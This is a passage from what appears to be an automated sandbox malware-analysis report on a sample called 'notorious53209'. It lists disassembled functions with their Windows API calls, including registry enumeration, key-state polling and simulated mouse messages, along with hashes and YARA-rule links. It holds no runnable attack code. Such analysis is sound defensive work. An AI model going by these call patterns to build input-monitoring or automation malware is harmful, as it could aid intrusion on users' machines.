                                                  • Opcode ID: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
                                                  • Instruction ID: 07ece44c84d1334fef289d17691e7bf6ff135245755e912084accfa81fac9db2
                                                  • Opcode Fuzzy Hash: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
                                                  • Instruction Fuzzy Hash: DD8152716047119FD724EF28C886F2AB7E5FF88720F14881DF696DB292DB70AD418B52
                                                  Function 009002C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?), ref: 009010BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900388
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009003C7
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0090040E
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 0090043A
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00900447
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: 59593c8b4750be1e8484a30358fe20a6affc762aadf7a074d8f3ac37508d4292
                                                  • Instruction ID: 6685edd824a130673ab16c5db8da7bf47b45fd988f3a9baa6f94fc16c2fce2e2
                                                  • Opcode Fuzzy Hash: 59593c8b4750be1e8484a30358fe20a6affc762aadf7a074d8f3ac37508d4292
                                                  • Instruction Fuzzy Hash: 92513831208204AFD714EF68C891F6EB7E8FF88714F44892EF595972A1EB31E905DB52
                                                  Function 008EE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008EE88A
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008EE8B3
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008EE8F2
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008EE917
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008EE91F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 818f43cadc89a5ffb28fd25507eda93a745322608825ca69489fff09b7fc82b3
                                                  • Instruction ID: a98398eb4513fb86ac8511e43c6a1d0e99dea6e49bb561991cb2e44be22aea8b
                                                  • Opcode Fuzzy Hash: 818f43cadc89a5ffb28fd25507eda93a745322608825ca69489fff09b7fc82b3
                                                  • Instruction Fuzzy Hash: 86510935A00215DFCB15EF69C9819AEBBF5FF09310B1880A9E849EB362CB31ED11DB51
                                                  Function 0090A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3da126257d906fdb26cd56461837ddaddbe1a45b4a9f716d36b41c8f7ffefb65
                                                  • Instruction ID: f60d54fefe89b32cf8997d636cb0aaf950443a75c21007c7e75cbb5c94d0893f
                                                  • Opcode Fuzzy Hash: 3da126257d906fdb26cd56461837ddaddbe1a45b4a9f716d36b41c8f7ffefb65
                                                  • Instruction Fuzzy Hash: 2441D139904304AFD720DF28CC58FA9BBACFB09320F154265F855A72E1D770AE81DAD2
                                                  Function 00882344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00882357
                                                  • ScreenToClient.USER32(009467B0,?), ref: 00882374
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00882399
                                                  • GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: 95b161cc0927f50e4f5f1dc5300dc7182a120870e151420288181046f38ed2ba
                                                  • Instruction ID: 87dcc7880c9624c1cd4d7aae12439e96ec8ddfd174547df84e128421f564d77d
                                                  • Opcode Fuzzy Hash: 95b161cc0927f50e4f5f1dc5300dc7182a120870e151420288181046f38ed2ba
                                                  • Instruction Fuzzy Hash: 1C417F75504119FFDF19AF68C854AEDBB74FB45324F20435AF828E23A0C7346A94DB91
                                                  Function 008D6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D695D
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 008D69A9
                                                  • TranslateMessage.USER32(?), ref: 008D69D2
                                                  • DispatchMessageW.USER32(?), ref: 008D69DC
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D69EB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                  • String ID:
                                                  • API String ID: 2108273632-0
                                                  • Opcode ID: 98fcded3d896ec28aa4784381cc11e5c26c91fbde17f7de38bf0ad55428b7f76
                                                  • Instruction ID: 905f78107de634287fa5c5eae3bab8bba848eeb4814ea5d38e4d80d03268e2ff
                                                  • Opcode Fuzzy Hash: 98fcded3d896ec28aa4784381cc11e5c26c91fbde17f7de38bf0ad55428b7f76
                                                  • Instruction Fuzzy Hash: 4E31E4B191421EBEDB20CF748C94FB67BA8FB03304F144366E461D22A1F77598A5E791
                                                  Function 008D8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 008D8F12
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 008D8FBC
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008D8FC4
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 008D8FD2
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008D8FDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                                                  • Instruction ID: ecb873577da332d9bff5531a0b677e8e231a84c64801938d2bd23431b7610f97
                                                  • Opcode Fuzzy Hash: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                                                  • Instruction Fuzzy Hash: A431CE71504219EFDB14CF68DD4CAAE7BB6FB04315F10422AF925EA2D0CBB09A54DB91
                                                  Function 008DB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 008DB6C7
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008DB6E4
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008DB71C
                                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 008DB742
                                                  • _wcsstr.LIBCMT ref: 008DB74C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: 70910bcae6bef3c8b8f90507723a334cad41879ec990eb656d791807f4189acf
                                                  • Instruction ID: 9fe8474bc5a5f9912149489fafd98e8042c9d8703ee286a5da8833311dae1795
                                                  • Opcode Fuzzy Hash: 70910bcae6bef3c8b8f90507723a334cad41879ec990eb656d791807f4189acf
                                                  • Instruction Fuzzy Hash: 5B21F932204248FFEB255B799C49E7B7B98FF4A760F01413AFC05CA2A1EF61DC419661
                                                  Function 0090B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090B44C
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0090B471
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0090B489
                                                  • GetSystemMetrics.USER32(00000004), ref: 0090B4B2
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0090B4D0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: 86ec7f6ce3a4cb5e1f643ca6cf9a1d50819cd03dd39f90128b7ca94d7da84d0f
                                                  • Instruction ID: 2b16aaceec89b4fe5c4efa86ac1a205168fadc5d243e94c7569bd85d7358c61c
                                                  • Opcode Fuzzy Hash: 86ec7f6ce3a4cb5e1f643ca6cf9a1d50819cd03dd39f90128b7ca94d7da84d0f
                                                  • Instruction Fuzzy Hash: 98219571524255AFCB209F39CC54A6A37A8FB05720F154B38FD26D76F1E7309A50EB90
                                                  Function 008D97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008D9802
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9834
                                                  • __itow.LIBCMT ref: 008D984C
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9874
                                                  • __itow.LIBCMT ref: 008D9885
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow$_memmove
                                                  • String ID:
                                                  • API String ID: 2983881199-0
                                                  • Opcode ID: b07df7a429ad997a44794a6029c0fc6f6c3677c95acd308135993ce618eb69d0
                                                  • Instruction ID: bc12aada8573d5c72aacd67df957bd366627da1998eb1c4fbef0cfba1c10dfa7
                                                  • Opcode Fuzzy Hash: b07df7a429ad997a44794a6029c0fc6f6c3677c95acd308135993ce618eb69d0
                                                  • Instruction Fuzzy Hash: B221DA31B00208AFDB20AA658C86EEE7BB9FF4AB14F140136FD45DB351D671DD41A792
                                                  Function 008812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0088134D
                                                  • SelectObject.GDI32(?,00000000), ref: 0088135C
                                                  • BeginPath.GDI32(?), ref: 00881373
                                                  • SelectObject.GDI32(?,00000000), ref: 0088139C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 9062601c9b41f77976e81a73fffb5ebe9da5a42be2d1c569dab1449b006a1653
                                                  • Instruction ID: 61d21b3c8534c431f812fe0fc12d50a92f657f2833ef26fe49b945afe10f5b68
                                                  • Opcode Fuzzy Hash: 9062601c9b41f77976e81a73fffb5ebe9da5a42be2d1c569dab1449b006a1653
                                                  • Instruction Fuzzy Hash: 3C2162B4828308DFDF219F25DC08B697BB8FB12322F144225F414D67A0DB759992EB91
                                                  Function 008DC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 4905800d39e264a15e7e56b886ca92b530dc8e1535d2d9f0581b5e8126e340fc
                                                  • Instruction ID: fdd9ef3d68a64f66f80602a58f45960c5b2348a7c1937313c7eb8d534cce9ab4
                                                  • Opcode Fuzzy Hash: 4905800d39e264a15e7e56b886ca92b530dc8e1535d2d9f0581b5e8126e340fc
                                                  • Instruction Fuzzy Hash: 6001967170422B7BEA04B6255C46EAB775CFF623A8F044212FE04D6383E6609E11C2E1
                                                  Function 008E4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 008E4D5C
                                                  • __beginthreadex.LIBCMT ref: 008E4D7A
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 008E4D8F
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 008E4DA5
                                                  • CloseHandle.KERNEL32(00000000), ref: 008E4DAC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 1b6a01aa170c3661893078f4415c417e33cf28a212a945cc275f4df61a4b54ea
                                                  • Instruction ID: c288b7a8e06307dccab53b3bb471b80204bc55dd3208929d216f60be6f2eef89
                                                  • Opcode Fuzzy Hash: 1b6a01aa170c3661893078f4415c417e33cf28a212a945cc275f4df61a4b54ea
                                                  • Instruction Fuzzy Hash: 731148B6A18248BFC7108FA89C04E9A7FACFB87320F144265F928D3250C6B18D0497A1
                                                  Function 008D874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                                  • GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                                  • RtlAllocateHeap.NTDLL(00000000,?,008D822A), ref: 008D8786
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 883493501-0
                                                  • Opcode ID: fb8e16d4c09777ff33cf5f9312ee9cc6f948f4c3f258567e10895834fe1cc98b
                                                  • Instruction ID: a029189f417080a2837b696860bc1cc72694e68deaf9d9116cde0a329747dc0b
                                                  • Opcode Fuzzy Hash: fb8e16d4c09777ff33cf5f9312ee9cc6f948f4c3f258567e10895834fe1cc98b
                                                  • Instruction Fuzzy Hash: D4016D71614208FFDB204FA6DC98D6B7BADFF89355720053AF849C2260DA329D40DA60
                                                  Function 008E54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5502
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5510
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5518
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5522
